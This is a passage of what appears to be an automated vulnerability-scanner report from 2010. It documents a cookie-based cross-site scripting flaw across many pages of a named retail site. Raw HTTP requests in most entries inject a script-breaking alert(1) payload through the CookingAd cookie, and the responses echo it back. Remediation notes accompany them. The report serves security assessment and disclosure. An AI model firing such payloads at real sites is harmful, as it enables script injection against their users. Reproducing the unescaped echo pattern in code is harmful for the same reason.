Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /products/shprodli.asp HTTP/1.1 Host: www.starbucksstore.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: CCVC=Version=1%2E0&ID=1; CCREFID=Version=1%2E0&ID=http%3A%2F%2Fwww%2Estarbucks%2Ecom%2Fcoffee%2Fvia%2Fflavored%2Dcoffee; SITESERVER=Version=1%2E0&ID=29BB94B7790042E690D3142F9FDF2C8C; ASPSESSIONIDACABBACA=OKBMDLCBGJFNOPGDEIPJMFNK; ASPSESSIONIDCCDDADAA=GOPJDLCBKEOEKEKNCNEFKIHA; CookingAd=CCADATE=20101116&CCAID=SBPTPAHP1SHTB9727f</script><script>alert(1)</script>9636677bff4;
Response
HTTP/1.1 200 OK Cache-Control: private Content-Length: 14427 Content-Type: text/html Server: Microsoft-IIS/7.0 X-Powered-By: ASP.NET Date: Tue, 16 Nov 2010 18:39:00 GMT Connection: close
<!--S1--><!--S0-->
<html> <head> <LINK REL="StyleSheet" HREF="/include/sitenew.css" TYPE="text/css"> <META HTTP-EQUIV="Content-Type" CONTENT="text/html; charset=ISO-8859-1"> <meta name= ...[SNIP]... Name="Search Listing:" var s_setRef="" var s_server="10.11.5.109" var s_channel="Shopping" var s_pageType="" var s_prop1="" var s_prop2="/products/shprodli.asp" var s_prop3="SBPTPAHP1SHTB9727F</SCRIPT><SCRIPT>ALERT(1)</SCRIPT>9636677BFF4" var s_prop4="" var s_prop5="" var s_prop6="/products/shprodli.asp" var s_prop7="" var s_prop8="" var s_prop9="Search Listing: Internal: " var s_prop10="" /* E-commerce Variables */
The value of the CookingAd cookie is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 798a2</script><script>alert(1)</script>711801d72b9 was submitted in the CookingAd cookie. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /products/sitemap.asp HTTP/1.1 Host: www.starbucksstore.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: CCVC=Version=1%2E0&ID=1; CCREFID=Version=1%2E0&ID=http%3A%2F%2Fwww%2Estarbucks%2Ecom%2Fcoffee%2Fvia%2Fflavored%2Dcoffee; SITESERVER=Version=1%2E0&ID=29BB94B7790042E690D3142F9FDF2C8C; ASPSESSIONIDACABBACA=OKBMDLCBGJFNOPGDEIPJMFNK; ASPSESSIONIDCCDDADAA=GOPJDLCBKEOEKEKNCNEFKIHA; CookingAd=CCADATE=20101116&CCAID=SBPTPAHP1SHTB798a2</script><script>alert(1)</script>711801d72b9;
Response
HTTP/1.1 200 OK Cache-Control: private Content-Length: 21157 Content-Type: text/html Server: Microsoft-IIS/7.0 X-Powered-By: ASP.NET Date: Tue, 16 Nov 2010 18:43:26 GMT Connection: close
<!--S1--><!--S0-->
<html> <head> <LINK REL="StyleSheet" HREF="/include/sitenew.css" TYPE="text/css"> <META HTTP-EQUIV="Content-Type" CONTENT="text/html; charset=ISO-8859-1"> <meta name= ...[SNIP]... "/products/sitemap.asp" var s_setRef="" var s_server="10.11.5.109" var s_channel="Shopping" var s_pageType="" var s_prop1="" var s_prop2="/products/sitemap.asp" var s_prop3="SBPTPAHP1SHTB798A2</SCRIPT><SCRIPT>ALERT(1)</SCRIPT>711801D72B9" var s_prop4="" var s_prop5="" var s_prop6="/products/sitemap.asp" var s_prop7="" var s_prop8="" var s_prop9="" var s_prop10="" /* E-commerce Variables */ var s_campaign="" var s_s ...[SNIP]...
The value of the CookingAd cookie is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 2d241</script><script>alert(1)</script>487db803af4 was submitted in the CookingAd cookie. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /products/terms.asp HTTP/1.1 Host: www.starbucksstore.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: CCVC=Version=1%2E0&ID=1; CCREFID=Version=1%2E0&ID=http%3A%2F%2Fwww%2Estarbucks%2Ecom%2Fcoffee%2Fvia%2Fflavored%2Dcoffee; SITESERVER=Version=1%2E0&ID=29BB94B7790042E690D3142F9FDF2C8C; ASPSESSIONIDACABBACA=OKBMDLCBGJFNOPGDEIPJMFNK; ASPSESSIONIDCCDDADAA=GOPJDLCBKEOEKEKNCNEFKIHA; CookingAd=CCADATE=20101116&CCAID=SBPTPAHP1SHTB2d241</script><script>alert(1)</script>487db803af4;
Response
HTTP/1.1 200 OK Cache-Control: private Content-Length: 15962 Content-Type: text/html Server: Microsoft-IIS/7.0 X-Powered-By: ASP.NET Date: Tue, 16 Nov 2010 18:42:01 GMT Connection: close
<!--S1--><!--S0-->
<html> <head> <LINK REL="StyleSheet" HREF="/include/sitenew.css" TYPE="text/css"> <META HTTP-EQUIV="Content-Type" CONTENT="text/html; charset=ISO-8859-1"> <meta name= ...[SNIP]... ame="/products/terms.asp" var s_setRef="" var s_server="10.11.5.109" var s_channel="Shopping" var s_pageType="" var s_prop1="" var s_prop2="/products/terms.asp" var s_prop3="SBPTPAHP1SHTB2D241</SCRIPT><SCRIPT>ALERT(1)</SCRIPT>487DB803AF4" var s_prop4="" var s_prop5="" var s_prop6="/products/terms.asp" var s_prop7="" var s_prop8="" var s_prop9="" var s_prop10="" /* E-commerce Variables */ var s_campaign="" var s_sta ...[SNIP]...
The value of the CookingAd cookie is copied into a JavaScript string which is encapsulated in double quotation marks. The payload fae82</script><script>alert(1)</script>675c202d2cd was submitted in the CookingAd cookie. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.
Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /small-office-coffee HTTP/1.1 Host: www.starbucksstore.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: CCVC=Version=1%2E0&ID=1; CCREFID=Version=1%2E0&ID=http%3A%2F%2Fwww%2Estarbucks%2Ecom%2Fcoffee%2Fvia%2Fflavored%2Dcoffee; SITESERVER=Version=1%2E0&ID=29BB94B7790042E690D3142F9FDF2C8C; ASPSESSIONIDACABBACA=OKBMDLCBGJFNOPGDEIPJMFNK; ASPSESSIONIDCCDDADAA=GOPJDLCBKEOEKEKNCNEFKIHA; CookingAd=CCADATE=20101116&CCAID=SBPTPAHP1SHTBfae82</script><script>alert(1)</script>675c202d2cd;
Response (redirected)
HTTP/1.1 200 OK Cache-Control: private Content-Length: 20742 Content-Type: text/html Server: Microsoft-IIS/7.0 X-Powered-By: ASP.NET Date: Tue, 16 Nov 2010 18:38:15 GMT Connection: close
<html> <head> <link REL="StyleSheet" HREF="/include/sitenew.css" TYPE="text/css"> <meta HTTP-EQUIV="Cont ...[SNIP]... ice HomePage" var s_setRef="" var s_server="10.11.5.109" var s_channel="Shopping" var s_pageType="" var s_prop1="" var s_prop2="Starbucks Small Office HomePage" var s_prop3="SBPTPAHP1SHTBFAE82</SCRIPT><SCRIPT>ALERT(1)</SCRIPT>675C202D2CD" var s_prop4="" var s_prop5="" var s_prop6="/small-office-coffee/default.asp" var s_prop7="" var s_prop8="" var s_prop9="" var s_prop10="" /* E-commerce Variables */ var s_campaign=" ...[SNIP]...
The value of the CookingAd cookie is copied into a JavaScript string which is encapsulated in double quotation marks. The payload b3e71</script><script>alert(1)</script>14d1501ca39 was submitted in the CookingAd cookie. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.
Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /starbucks-coffee-delivery HTTP/1.1 Host: www.starbucksstore.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: CCVC=Version=1%2E0&ID=1; CCREFID=Version=1%2E0&ID=http%3A%2F%2Fwww%2Estarbucks%2Ecom%2Fcoffee%2Fvia%2Fflavored%2Dcoffee; SITESERVER=Version=1%2E0&ID=29BB94B7790042E690D3142F9FDF2C8C; ASPSESSIONIDACABBACA=OKBMDLCBGJFNOPGDEIPJMFNK; ASPSESSIONIDCCDDADAA=GOPJDLCBKEOEKEKNCNEFKIHA; CookingAd=CCADATE=20101116&CCAID=SBPTPAHP1SHTBb3e71</script><script>alert(1)</script>14d1501ca39;
Response (redirected)
HTTP/1.1 200 OK Cache-Control: private Content-Length: 19580 Content-Type: text/html Server: Microsoft-IIS/7.0 X-Powered-By: ASP.NET Date: Tue, 16 Nov 2010 18:38:16 GMT Connection: close
<meta HTTP-EQUIV="Conten ...[SNIP]... at Home HomePage" var s_setRef="" var s_server="10.11.5.109" var s_channel="Shopping" var s_pageType="" var s_prop1="" var s_prop2="Starbucks at Home HomePage" var s_prop3="SBPTPAHP1SHTBB3E71</SCRIPT><SCRIPT>ALERT(1)</SCRIPT>14D1501CA39" var s_prop4="" var s_prop5="" var s_prop6="/starbucks-coffee-delivery/default.asp" var s_prop7="" var s_prop8="" var s_prop9="" var s_prop10="" /* E-commerce Variables */ var s_camp ...[SNIP]...
The value of the CookingAd cookie is copied into a JavaScript string which is encapsulated in double quotation marks. The payload bfd3e</script><script>alert(1)</script>0ff078f663a was submitted in the CookingAd cookie. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /starbucks-coffee-delivery/ HTTP/1.1 Host: www.starbucksstore.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: CCVC=Version=1%2E0&ID=1; CCREFID=Version=1%2E0&ID=http%3A%2F%2Fwww%2Estarbucks%2Ecom%2Fcoffee%2Fvia%2Fflavored%2Dcoffee; SITESERVER=Version=1%2E0&ID=29BB94B7790042E690D3142F9FDF2C8C; ASPSESSIONIDACABBACA=OKBMDLCBGJFNOPGDEIPJMFNK; ASPSESSIONIDCCDDADAA=GOPJDLCBKEOEKEKNCNEFKIHA; CookingAd=CCADATE=20101116&CCAID=SBPTPAHP1SHTBbfd3e</script><script>alert(1)</script>0ff078f663a;
Response
HTTP/1.1 200 OK Cache-Control: private Content-Length: 19580 Content-Type: text/html Server: Microsoft-IIS/7.0 X-Powered-By: ASP.NET Date: Tue, 16 Nov 2010 18:45:04 GMT Connection: close
<meta HTTP-EQUIV="Conten ...[SNIP]... at Home HomePage" var s_setRef="" var s_server="10.11.5.109" var s_channel="Shopping" var s_pageType="" var s_prop1="" var s_prop2="Starbucks at Home HomePage" var s_prop3="SBPTPAHP1SHTBBFD3E</SCRIPT><SCRIPT>ALERT(1)</SCRIPT>0FF078F663A" var s_prop4="" var s_prop5="" var s_prop6="/starbucks-coffee-delivery/default.asp" var s_prop7="" var s_prop8="" var s_prop9="" var s_prop10="" /* E-commerce Variables */ var s_camp ...[SNIP]...
The value of the CookingAd cookie is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 1d9d8</script><script>alert(1)</script>b1e2ceb23fc was submitted in the CookingAd cookie. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /starbucks-coffee-tours/ HTTP/1.1 Host: www.starbucksstore.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: CCVC=Version=1%2E0&ID=1; CCREFID=Version=1%2E0&ID=http%3A%2F%2Fwww%2Estarbucks%2Ecom%2Fcoffee%2Fvia%2Fflavored%2Dcoffee; SITESERVER=Version=1%2E0&ID=29BB94B7790042E690D3142F9FDF2C8C; ASPSESSIONIDACABBACA=OKBMDLCBGJFNOPGDEIPJMFNK; ASPSESSIONIDCCDDADAA=GOPJDLCBKEOEKEKNCNEFKIHA; CookingAd=CCADATE=20101116&CCAID=SBPTPAHP1SHTB1d9d8</script><script>alert(1)</script>b1e2ceb23fc;
Response
HTTP/1.1 200 OK Cache-Control: private Content-Length: 16822 Content-Type: text/html Server: Microsoft-IIS/7.0 X-Powered-By: ASP.NET Date: Tue, 16 Nov 2010 18:38:32 GMT Connection: close
<!--S1--><!--S0--> <html> <head> <link REL="StyleSheet" HREF="/include/sitenew.css" TYPE="text/css"> <meta HTTP-EQUIV="Content-Type" CONTENT="text/html; charset=ISO-8859-1"> <meta NAME=" ...[SNIP]... e="Starbucks Tours Page" var s_setRef="" var s_server="10.11.5.109" var s_channel="Shopping" var s_pageType="" var s_prop1="" var s_prop2="Starbucks Tours Page" var s_prop3="SBPTPAHP1SHTB1D9D8</SCRIPT><SCRIPT>ALERT(1)</SCRIPT>B1E2CEB23FC" var s_prop4="" var s_prop5="" var s_prop6="/starbucks-coffee-tours/default.asp" var s_prop7="" var s_prop8="" var s_prop9="" var s_prop10="" /* E-commerce Variables */ var s_campaig ...[SNIP]...
The value of the CookingAd cookie is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 2f0a0</script><script>alert(1)</script>ba0159ff903 was submitted in the CookingAd cookie. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.
Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /starbucks-gift-cards HTTP/1.1 Host: www.starbucksstore.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: CCVC=Version=1%2E0&ID=1; CCREFID=Version=1%2E0&ID=http%3A%2F%2Fwww%2Estarbucks%2Ecom%2Fcoffee%2Fvia%2Fflavored%2Dcoffee; SITESERVER=Version=1%2E0&ID=29BB94B7790042E690D3142F9FDF2C8C; ASPSESSIONIDACABBACA=OKBMDLCBGJFNOPGDEIPJMFNK; ASPSESSIONIDCCDDADAA=GOPJDLCBKEOEKEKNCNEFKIHA; CookingAd=CCADATE=20101116&CCAID=SBPTPAHP1SHTB2f0a0</script><script>alert(1)</script>ba0159ff903;
Response (redirected)
HTTP/1.1 200 OK Cache-Control: private Content-Length: 19751 Content-Type: text/html Server: Microsoft-IIS/7.0 X-Powered-By: ASP.NET Date: Tue, 16 Nov 2010 18:38:19 GMT Connection: close
<!--S1--><!--S0-->
<html> <head> <LINK REL="StyleSheet" HREF="/include/sitenew.css" TYPE="text/css"> <META HTTP-EQUIV="Content-Type" CONTENT="text/html; charset=ISO-8859-1"> <meta name= ...[SNIP]... rbucks Card HomePage" var s_setRef="" var s_server="10.11.5.109" var s_channel="Shopping" var s_pageType="" var s_prop1="" var s_prop2="Starbucks Card HomePage" var s_prop3="SBPTPAHP1SHTB2F0A0</SCRIPT><SCRIPT>ALERT(1)</SCRIPT>BA0159FF903" var s_prop4="" var s_prop5="" var s_prop6="/starbucks-gift-cards/default.asp" var s_prop7="" var s_prop8="" var s_prop9="" var s_prop10="" /* E-commerce Variables */ var s_campaign= ...[SNIP]...
The value of the CookingAd cookie is copied into a JavaScript string which is encapsulated in double quotation marks. The payload f9ad5</script><script>alert(1)</script>a10c039ee07 was submitted in the CookingAd cookie. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.
Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /starbucks-gifts HTTP/1.1 Host: www.starbucksstore.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: CCVC=Version=1%2E0&ID=1; CCREFID=Version=1%2E0&ID=http%3A%2F%2Fwww%2Estarbucks%2Ecom%2Fcoffee%2Fvia%2Fflavored%2Dcoffee; SITESERVER=Version=1%2E0&ID=29BB94B7790042E690D3142F9FDF2C8C; ASPSESSIONIDACABBACA=OKBMDLCBGJFNOPGDEIPJMFNK; ASPSESSIONIDCCDDADAA=GOPJDLCBKEOEKEKNCNEFKIHA; CookingAd=CCADATE=20101116&CCAID=SBPTPAHP1SHTBf9ad5</script><script>alert(1)</script>a10c039ee07;
Response (redirected)
HTTP/1.1 200 OK Cache-Control: private Content-Length: 17245 Content-Type: text/html Server: Microsoft-IIS/7.0 X-Powered-By: ASP.NET Date: Tue, 16 Nov 2010 18:38:01 GMT Connection: close
<!--S1--><!--S0--> <html> <head> <link REL="StyleSheet" HREF="/include/sitenew.css" TYPE="text/css"> <meta HTTP-EQUIV="Content-Type" CONTENT="text/html; charset=ISO-8859-1"> <meta name="d ...[SNIP]... ame="Starbucks Gift Page" var s_setRef="" var s_server="10.11.5.109" var s_channel="Shopping" var s_pageType="" var s_prop1="" var s_prop2="Starbucks Gift Page" var s_prop3="SBPTPAHP1SHTBF9AD5</SCRIPT><SCRIPT>ALERT(1)</SCRIPT>A10C039EE07" var s_prop4="" var s_prop5="" var s_prop6="/starbucks-gifts/default.asp" var s_prop7="" var s_prop8="" var s_prop9="" var s_prop10="" /* E-commerce Variables */ var s_campaign=""
The value of the CookingAd cookie is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 8ab9e</script><script>alert(1)</script>091524f545b was submitted in the CookingAd cookie. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /starbucks-gifts/ HTTP/1.1 Host: www.starbucksstore.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: CCVC=Version=1%2E0&ID=1; CCREFID=Version=1%2E0&ID=http%3A%2F%2Fwww%2Estarbucks%2Ecom%2Fcoffee%2Fvia%2Fflavored%2Dcoffee; SITESERVER=Version=1%2E0&ID=29BB94B7790042E690D3142F9FDF2C8C; ASPSESSIONIDACABBACA=OKBMDLCBGJFNOPGDEIPJMFNK; ASPSESSIONIDCCDDADAA=GOPJDLCBKEOEKEKNCNEFKIHA; CookingAd=CCADATE=20101116&CCAID=SBPTPAHP1SHTB8ab9e</script><script>alert(1)</script>091524f545b;
Response
HTTP/1.1 200 OK Cache-Control: private Content-Length: 17245 Content-Type: text/html Server: Microsoft-IIS/7.0 X-Powered-By: ASP.NET Date: Tue, 16 Nov 2010 18:38:45 GMT Connection: close
<!--S1--><!--S0--> <html> <head> <link REL="StyleSheet" HREF="/include/sitenew.css" TYPE="text/css"> <meta HTTP-EQUIV="Content-Type" CONTENT="text/html; charset=ISO-8859-1"> <meta name="d ...[SNIP]... ame="Starbucks Gift Page" var s_setRef="" var s_server="10.11.5.109" var s_channel="Shopping" var s_pageType="" var s_prop1="" var s_prop2="Starbucks Gift Page" var s_prop3="SBPTPAHP1SHTB8AB9E</SCRIPT><SCRIPT>ALERT(1)</SCRIPT>091524F545B" var s_prop4="" var s_prop5="" var s_prop6="/starbucks-gifts/default.asp" var s_prop7="" var s_prop8="" var s_prop9="" var s_prop10="" /* E-commerce Variables */ var s_campaign=""
The value of the CookingAd cookie is copied into a JavaScript string which is encapsulated in double quotation marks. The payload c9601</script><script>alert(1)</script>ad932c6690c was submitted in the CookingAd cookie. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.
Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /starbucks-reserve HTTP/1.1 Host: www.starbucksstore.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: CCVC=Version=1%2E0&ID=1; CCREFID=Version=1%2E0&ID=http%3A%2F%2Fwww%2Estarbucks%2Ecom%2Fcoffee%2Fvia%2Fflavored%2Dcoffee; SITESERVER=Version=1%2E0&ID=29BB94B7790042E690D3142F9FDF2C8C; ASPSESSIONIDACABBACA=OKBMDLCBGJFNOPGDEIPJMFNK; ASPSESSIONIDCCDDADAA=GOPJDLCBKEOEKEKNCNEFKIHA; CookingAd=CCADATE=20101116&CCAID=SBPTPAHP1SHTBc9601</script><script>alert(1)</script>ad932c6690c;
Response (redirected)
HTTP/1.1 200 OK Cache-Control: private Content-Length: 29291 Content-Type: text/html Server: Microsoft-IIS/7.0 X-Powered-By: ASP.NET Date: Tue, 16 Nov 2010 18:38:31 GMT Connection: close
<!--S1--><!--S0--> <html> <head> <link REL="StyleSheet" HREF="/include/sitenew.css" TYPE="text/css"> <meta HTTP-EQUIV="Content-Type" CONTENT="text/html; charset=ISO-8859-1"> <meta NAME=" ...[SNIP]... ve Coffee Page" var s_setRef="" var s_server="10.11.5.109" var s_channel="Shopping" var s_pageType="" var s_prop1="" var s_prop2="Starbucks Reserve Coffee Page" var s_prop3="SBPTPAHP1SHTBC9601</SCRIPT><SCRIPT>ALERT(1)</SCRIPT>AD932C6690C" var s_prop4="" var s_prop5="" var s_prop6="/starbucks-reserve/default.asp" var s_prop7="" var s_prop8="" var s_prop9="" var s_prop10="" /* E-commerce Variables */ var s_campaign="" ...[SNIP]...
The value of the CookingAd cookie is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 99900</script><script>alert(1)</script>837b0729912 was submitted in the CookingAd cookie. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.
Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /starbucks-seasonal HTTP/1.1 Host: www.starbucksstore.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: CCVC=Version=1%2E0&ID=1; CCREFID=Version=1%2E0&ID=http%3A%2F%2Fwww%2Estarbucks%2Ecom%2Fcoffee%2Fvia%2Fflavored%2Dcoffee; SITESERVER=Version=1%2E0&ID=29BB94B7790042E690D3142F9FDF2C8C; ASPSESSIONIDACABBACA=OKBMDLCBGJFNOPGDEIPJMFNK; ASPSESSIONIDCCDDADAA=GOPJDLCBKEOEKEKNCNEFKIHA; CookingAd=CCADATE=20101116&CCAID=SBPTPAHP1SHTB99900</script><script>alert(1)</script>837b0729912;
Response (redirected)
HTTP/1.1 200 OK Cache-Control: private Content-Length: 79452 Content-Type: text/html Server: Microsoft-IIS/7.0 X-Powered-By: ASP.NET Date: Tue, 16 Nov 2010 18:39:35 GMT Connection: close
<!--S1--><!--S0-->
<html> <head> <LINK REL="StyleSheet" HREF="/include/sitenew.css" TYPE="text/css"> <META HTTP-EQUIV="Content-Type" CONTENT="text/html; charset=ISO-8859-1"> <meta name= ...[SNIP]... pageName="Search Listing:" var s_setRef="" var s_server="10.11.5.109" var s_channel="" var s_pageType="" var s_prop1="" var s_prop2="Search Listing: Internal: " var s_prop3="SBPTPAHP1SHTB99900</SCRIPT><SCRIPT>ALERT(1)</SCRIPT>837B0729912" var s_prop4="" var s_prop5="" var s_prop6="/starbucks-seasonal/starbucks-seasonal.asp" var s_prop7="" var s_prop8="" var s_prop9="" var s_prop10="" /* E-commerce Variables */ var s_ ...[SNIP]...
The value of the CookingAd cookie is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 3e7f7</script><script>alert(1)</script>6c9e3006551 was submitted in the CookingAd cookie. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /starbucks-seasonal/starbucks-seasonal.asp HTTP/1.1 Host: www.starbucksstore.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: CCVC=Version=1%2E0&ID=1; CCREFID=Version=1%2E0&ID=http%3A%2F%2Fwww%2Estarbucks%2Ecom%2Fcoffee%2Fvia%2Fflavored%2Dcoffee; SITESERVER=Version=1%2E0&ID=29BB94B7790042E690D3142F9FDF2C8C; ASPSESSIONIDACABBACA=OKBMDLCBGJFNOPGDEIPJMFNK; ASPSESSIONIDCCDDADAA=GOPJDLCBKEOEKEKNCNEFKIHA; CookingAd=CCADATE=20101116&CCAID=SBPTPAHP1SHTB3e7f7</script><script>alert(1)</script>6c9e3006551;
Response
HTTP/1.1 200 OK Cache-Control: private Content-Length: 79452 Content-Type: text/html Server: Microsoft-IIS/7.0 X-Powered-By: ASP.NET Date: Tue, 16 Nov 2010 18:46:17 GMT Connection: close
<!--S1--><!--S0-->
